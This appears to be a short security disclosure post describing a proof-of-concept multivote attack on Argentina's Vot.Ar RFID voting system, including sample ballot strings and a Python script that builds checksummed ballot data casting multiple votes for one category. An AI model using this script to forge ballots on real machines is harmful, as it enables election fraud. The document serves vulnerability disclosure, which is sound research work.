Multivote attack on Vot.Ar system: PoC

RFID ballots have a simple structure. The following example shows a ballot for “Representative” (REP), “Mayor” (MAY), and “Ward” (WRD) for province Buenos Aires (CABA):


And this is a ballot who casts three votes for category “Mayor”:


And this is one that casts 10 votes for “Mayor”:


There are other possibilities. The following ballot casts one vote for each category, and then adds six additional votes for “Mayor”:


 Multi-vote ballot generator

The Python script below generates the correct CRC32 checksum for the RFID chip. Details about the format used in these ballots is available in some Github projects. These values can be added manually through an Android-based NFC application with write capabilities, like NFC-V.

from zlib import crc32
from struct import pack
ballot="06CABA.1WRD1234REP5678MAY5678" # original
ballot="06CABA.1WRD1234MAY5678MAY5678" # 2 MAY
print "Message length: %02X" % len(ballot)
print "CRC: %s" % ' '.join(map(lambda x:"%02X"%ord(x),pack("i",crc32(ballot))))
print "Ballot data: %s" % ' '.join(map(lambda x:"%02X"%ord(x),ballot))

Translated by: Juliano Rizzo

This is a short description of the Multivote attack Proof of Concept on the Vot.Ar system.  More info in the full report.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *